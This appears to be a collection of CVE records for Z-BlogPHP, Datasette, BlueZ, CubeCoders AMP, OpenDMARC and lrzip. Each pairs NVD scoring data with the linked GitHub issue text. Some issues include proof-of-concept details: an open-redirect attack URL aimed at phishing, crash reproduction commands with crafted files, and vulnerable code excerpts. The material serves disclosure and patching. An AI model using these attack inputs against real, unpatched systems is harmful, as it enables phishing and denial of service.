{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/zblogcn/zblogphp/issues/209" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/zblogcn/zblogphp/issues/216" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/zblogcn/zblogphp/issues/209" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/zblogcn/zblogphp/issues/216" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:zblogcn:z-blogphp:*:*:*:*:*:*:*:*", "matchCriteriaId": "3A8D5D89-5292-42F3-A3D5-0A1D29F54B6A", "versionEndExcluding": null, "versionEndIncluding": "1.5.2", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "601" ]
601
https://github.com/zblogcn/zblogphp/issues/216
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "zblogcn", "zblogphp" ]
Z-BlogPHP 1.5.2 has an Open Redirect via the zb_system/cmd.php redirect parameter. Open Redirection vulnerability Technical details: URL : http://localhost/zblog/zb_system/cmd.php?atc=login&redirect=http://www.baidu.com code: case 'login': if (!empty($zbp->user->ID) && GetVars('redirect', 'GET')) { Redirect(GetVars('redirect', 'GET')); } if ($zbp->CheckRights('admin')) { Redirect('cmd.php?act=admin'); } if (empty($zbp->user->ID) && GetVars('redirect', 'GET')) { setcookie("redirect", GetVars('redirect', 'GET'), 0, $zbp->cookiespath); } Redirect('login.php'); break; First: You need login in,then the vulnerability can run.So we use vulnerability for phishing attacks. Parameter Name : redirect Parameter Type : GET Attack Pattern : http://www.baidu.com (auth:1521106949@qq.com) Should there be anything else we can help you with, please do not hesitate to ask.
Z-BlogPHP 1.5.2 Open redirect vulnerability
https://api.github.com/repos/zblogcn/zblogphp/issues/216/comments
2
2019-04-04T06:05:11Z
2019-04-04T07:39:45Z
https://github.com/zblogcn/zblogphp/issues/216
429,097,855
216
2,023
CVE-2021-32670
2021-06-07T22:15:07.650
Datasette is an open source multi-tool for exploring and publishing data. The `?_trace=1` debugging feature in Datasette does not correctly escape generated HTML, resulting in a [reflected cross-site scripting](https://owasp.org/www-community/attacks/xss/#reflected-xss-attacks) vulnerability. This vulnerability is particularly relevant if your Datasette installation includes authenticated features using plugins such as [datasette-auth-passwords](https://datasette.io/plugins/datasette-auth-passwords) as an attacker could use the vulnerability to access protected data. Datasette 0.57 and 0.56.1 both include patches for this issue. If you run Datasette behind a proxy you can workaround this issue by rejecting any incoming requests with `?_trace=` or `&_trace=` in their query string parameters.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.2, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 2.7, "source": "security-advisories@github.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "security-advisories@github.com", "tags": [ "Vendor Advisory" ], "url": "https://datasette.io/plugins/datasette-auth-passwords" }, { "source": "security-advisories@github.com", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/simonw/datasette/issues/1360" }, { "source": "security-advisories@github.com", "tags": [ "Third Party Advisory" ], "url": "https://github.com/simonw/datasette/security/advisories/GHSA-xw7c-jx9m-xh5g" }, { "source": "security-advisories@github.com", "tags": [ "Third Party Advisory" ], "url": "https://owasp.org/www-community/attacks/xss/#reflected-xss-attacks" }, { "source": "security-advisories@github.com", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://pypi.org/project/datasette/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Vendor Advisory" ], "url": "https://datasette.io/plugins/datasette-auth-passwords" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/simonw/datasette/issues/1360" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/simonw/datasette/security/advisories/GHSA-xw7c-jx9m-xh5g" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://owasp.org/www-community/attacks/xss/#reflected-xss-attacks" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://pypi.org/project/datasette/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:datasette:datasette:*:*:*:*:*:*:*:*", "matchCriteriaId": "590DF843-9861-4843-84E2-E60641A2738F", "versionEndExcluding": "0.56.1", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/simonw/datasette/issues/1360
[ "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "simonw", "datasette" ]
See security advisory here for details: https://github.com/simonw/datasette/security/advisories/GHSA-xw7c-jx9m-xh5g - the `?_trace=1` debugging option was not correctly escaping its JSON output, resulting in a [reflected cross-site scripting](https://owasp.org/www-community/attacks/xss/#reflected-xss-attacks) vulnerability.
Security flaw, to be fixed in 0.56.1 and 0.57
https://api.github.com/repos/simonw/datasette/issues/1360/comments
2
2021-06-05T21:53:51Z
2021-06-05T22:23:23Z
https://github.com/simonw/datasette/issues/1360
912,464,443
1,360
2,024
CVE-2021-3588
2021-06-10T03:15:07.477
The cli_feat_read_cb() function in src/gatt-database.c does not perform bounds checks on the 'offset' variable before using it as an index into an array for reading.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 2.1, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 3.9, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 3.3, "baseSeverity": "LOW", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 1.4, "source": "security@ubuntu.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 3.3, "baseSeverity": "LOW", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 1.4, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "security@ubuntu.com", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/bluez/bluez/issues/70" }, { "source": "security@ubuntu.com", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202209-16" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/bluez/bluez/issues/70" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202209-16" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:bluez:bluez:*:*:*:*:*:*:*:*", "matchCriteriaId": "75456FDD-9DF3-44A6-8399-7B5947C2E850", "versionEndExcluding": "5.56", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
https://github.com/bluez/bluez/issues/70
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "bluez", "bluez" ]
https://github.com/bluez/bluez/blob/35a2c50437cca4d26ac6537ce3a964bb509c9b62/src/gatt-database.c#L1078-L1079 ```c static void cli_feat_read_cb(struct gatt_db_attribute *attrib, unsigned int id, uint16_t offset, uint8_t opcode, struct bt_att *att, void *user_data) { ... size_t len = 0; ... len = sizeof(state->cli_feat) - offset; value = len ? &state->cli_feat[offset] : NULL; ``` Both `len` and `sizeof()` are unsigned and `offset` is an external input without validation. It seems like a malicious GATT client can cause out-of-bound read on memory locations after the given device_state::cli_feat pointer. Similar validation like below should be sufficient: https://github.com/bluez/bluez/blob/35a2c50437cca4d26ac6537ce3a964bb509c9b62/src/gatt-database.c#L691
Potential buffer out-of-bound read in gatt-database.c:cli_feat_read_cb
https://api.github.com/repos/bluez/bluez/issues/70/comments
7
2021-01-04T06:12:01Z
2022-05-18T07:22:18Z
https://github.com/bluez/bluez/issues/70
777,845,223
70
2,025
CVE-2021-34539
2021-06-10T11:15:09.393
An issue was discovered in CubeCoders AMP before 2.1.1.8. A lack of validation of the Java Version setting means that an unintended executable path can be set. The result is that high-privileged users can trigger code execution.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.2, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.2, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/CubeCoders/AMP/issues/464" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/CubeCoders/AMP/issues/464" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cubecoders:amp:*:*:*:*:*:*:*:*", "matchCriteriaId": "4FF53C78-7246-4215-B2EA-87550733B894", "versionEndExcluding": "2.1.1.8", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "668" ]
668
https://github.com/CubeCoders/AMP/issues/464
[ "Third Party Advisory" ]
github.com
[ "CubeCoders", "AMP" ]
This was originally reported to us privately by Joel Frederick-Lewis - CVE-2021-34539 This issue exists for record keeping and disclosure purposes. # Bug Report ## System Information - Windows, Linux - 10/06/2021 B2 - Development ## I confirm: - [x] that I have searched for an existing bug report for this issue. - [x] that I am using the latest available version of AMP. - [x] that my operating system is up-to-date. ## Symptoms The 'Java Version' setting within AMP doesn't validate its setting in the way you'd expect for a potentially sensitive setting. AMP could be tricked by a malicious user (albeit one who already has a high level of access to the system) into running code that it shouldn't. ## Reproduction Alter the path to Java by using the Inspect Element tool in a browser for a given setting. ## Notes Because of the authentication and permissions requirements (users with this combination would reasonably be expected to have a high level of access to the host) this is regarded as a low risk, but potentially high impact issue. Instances running inside Docker aren't affected in the same way since they would not affect the host system. The issue was reported on 10/06/2021 and a fix was released the same day.
Security: Insufficient validation on Java Version setting.
https://api.github.com/repos/CubeCoders/AMP/issues/464/comments
2
2021-06-10T09:46:57Z
2021-07-26T12:02:26Z
https://github.com/CubeCoders/AMP/issues/464
917,143,156
464
2,026
CVE-2021-34555
2021-06-10T15:15:09.680
OpenDMARC 1.4.1 and 1.4.1.1 allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via a multi-value From header field.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/trusteddomainproject/OpenDMARC/issues/179" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/trusteddomainproject/OpenDMARC/pull/178" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2MAT4ZSWPQ5SUTMYCXRXI5SMTWL4AG7E/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VZHZD4WZDYRBB2XVW2EQ4DQ2KYMAGPUO/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/trusteddomainproject/OpenDMARC/issues/179" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/trusteddomainproject/OpenDMARC/pull/178" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2MAT4ZSWPQ5SUTMYCXRXI5SMTWL4AG7E/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VZHZD4WZDYRBB2XVW2EQ4DQ2KYMAGPUO/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:trusteddomain:opendmarc:1.4.1:*:*:*:*:*:*:*", "matchCriteriaId": "9922D3AD-0F06-4E0C-A95A-07220021F54B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:trusteddomain:opendmarc:1.4.1.1:*:*:*:*:*:*:*", "matchCriteriaId": "DBCADC57-4CE1-4C16-8B5B-0298BEDE5F5A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*", "matchCriteriaId": "E460AA51-FCDA-46B9-AE97-E6676AA5E194", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*", "matchCriteriaId": "A930E247-0B43-43CB-98FF-6CE7B8189835", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/trusteddomainproject/OpenDMARC/issues/179
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "trusteddomainproject", "OpenDMARC" ]
Hi, yesterday and today OpenDMARC has crashed for segfault half a dozen times on two virtual machines, one of them CentOS7, another CentOS8, both up-to-date and have OpenDKIM version 1.4.1. Before yesterday OpenDMARC and libopendmarc version 1.3.2 was installed and they worked fine. Last dmesg info was `[Tue Jun 8 11:19:32 2021] opendmarc[11107]: segfault at 0 ip 00007fa89690c327 sp 00007fa88ffdb1a8 error 4 in libc-2.17.so[7fa8967c5000+1c4000]` Red Hat Abrtd service was running, there is coredump and other files saved by it. Is there some additional information you would need to investigate the issue? The package version is opendmarc-1.4.1-1.el7.x86_64 on CentOS7 and opendmarc-1.4.1-1.el8.x86_64 on CentOS8.
OpenDMARC 1.4.1 segfault several times on two VMs, CentOS 7/8
https://api.github.com/repos/trusteddomainproject/OpenDMARC/issues/179/comments
33
2021-06-08T09:47:15Z
2022-12-24T14:59:13Z
https://github.com/trusteddomainproject/OpenDMARC/issues/179
914,712,714
179
2,027
CVE-2020-25467
2021-06-10T16:15:07.827
A null pointer dereference was discovered lzo_decompress_buf in stream.c in Irzip 0.621 which allows an attacker to cause a denial of service (DOS) via a crafted compressed file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://bugs.launchpad.net/ubuntu/+source/lrzip/+bug/1893641" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/ckolivas/lrzip/issues/163" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2022/04/msg00012.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://bugs.launchpad.net/ubuntu/+source/lrzip/+bug/1893641" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/ckolivas/lrzip/issues/163" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2022/04/msg00012.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:long_range_zip_project:long_range_zip:0.621:*:*:*:*:*:*:*", "matchCriteriaId": "85DEC5A9-696C-4D31-9561-C52DC3898E3D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/ckolivas/lrzip/issues/163
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "ckolivas", "lrzip" ]
Hi, there. There is invalid memory access in lzo_decompress_buf, stream.c 589 in the newest branch 597be1ffb. According to the trace, it seems to be an incomplete fix of CVE-2017-8845 and CVE-2019-10654. System: ~~~~ DISTRIB_ID=Ubuntu DISTRIB_RELEASE=16.04 DISTRIB_CODENAME=xenial DISTRIB_DESCRIPTION="Ubuntu 16.04.6 LTS" ~~~~ To reproduce, run: ~~~~ lrzip -t poc ~~~~ POC: [seg-stream589.zip](https://github.com/ckolivas/lrzip/files/5129144/seg-stream589.zip) which is made from this original tar file compressed by lrzip [test.tar.zip](https://github.com/ckolivas/lrzip/files/5129310/test.tar.zip) This is the output from the terminal: ~~~~ Decompressing... Segmentation fault ~~~~ This is the trace reported by ASAN: ~~~~ ==177389==ERROR: AddressSanitizer: SEGV on unknown address 0x606000010000 (pc 0x7f19986a0144 bp 0x62100001cd54 sp 0x7f1994afed60 T1) #0 0x7f19986a0143 in lzo1x_decompress (/lib/x86_64-linux-gnu/liblzo2.so.2+0x13143) #1 0x43faff in lzo_decompress_buf ../stream.c:589 #2 0x43faff in ucompthread ../stream.c:1529 #3 0x7f199804d6b9 in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x76b9) #4 0x7f199747f41c in clone (/lib/x86_64-linux-gnu/libc.so.6+0x10741c) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV ??:0 lzo1x_decompress Thread T1 created by T0 here: #0 0x7f19988e51e3 in pthread_create (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x361e3) #1 0x451505 in create_pthread ../stream.c:133 #2 0x451505 in fill_buffer ../stream.c:1694 #3 0x451505 in read_stream ../stream.c:1781 #4 0x18 (<unknown module>) ==177389==ABORTING ~~~~
segmentation fault in lzo_decompress_buf, stream.c 589, incomplete fix of CVE-2017-8845 and CVE-2019-10654
https://api.github.com/repos/ckolivas/lrzip/issues/163/comments
18
2020-08-26T10:22:13Z
2022-04-09T15:19:27Z
https://github.com/ckolivas/lrzip/issues/163
686,202,924
163
2,028
CVE-2021-27345
2021-06-10T16:15:08.067
A null pointer dereference was discovered in ucompthread in stream.c in Irzip 0.631 which allows attackers to cause a denial of service (DOS) via a crafted compressed file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/ckolivas/lrzip/issues/164" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2022/04/msg00012.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/ckolivas/lrzip/issues/164" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2022/04/msg00012.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:long_range_zip_project:long_range_zip:0.631:*:*:*:*:*:*:*", "matchCriteriaId": "1808BE16-400E-4C1B-A88C-7C03BD427F5C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/ckolivas/lrzip/issues/164
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "ckolivas", "lrzip" ]
Hi, there. There is a segmentation caused by null pointer dereference that leads to a fatal error during the execution in the newest master branch 597be1f. Here is a brief explanation: <img width="1730" alt="image" src="https://user-images.githubusercontent.com/7632714/91960266-46363600-ed3c-11ea-97b4-44c40c417f03.png"> This is the output during execution: ~~~~ Decompressing... Bad checksum: 0x5b496f91 - expected: 0x2000210c Fatal error - exiting Segmentation fault ~~~~ To reproduce, run: ~~~~ lrzip -t seg-stream1523 ~~~~ POC (unzip first): [seg-stream1523.zip](https://github.com/ckolivas/lrzip/files/5161106/seg-stream1523.zip) Here is the trace reported by ASAN: ~~~~ ==161258==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000080 (pc 0x00000043f8d8 bp 0x0000007cd680 sp 0x7f811dafdd80 T3) #0 0x43f8d7 in ucompthread ../stream.c:1523 #1 0x7f81218fc6b9 in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x76b9) #2 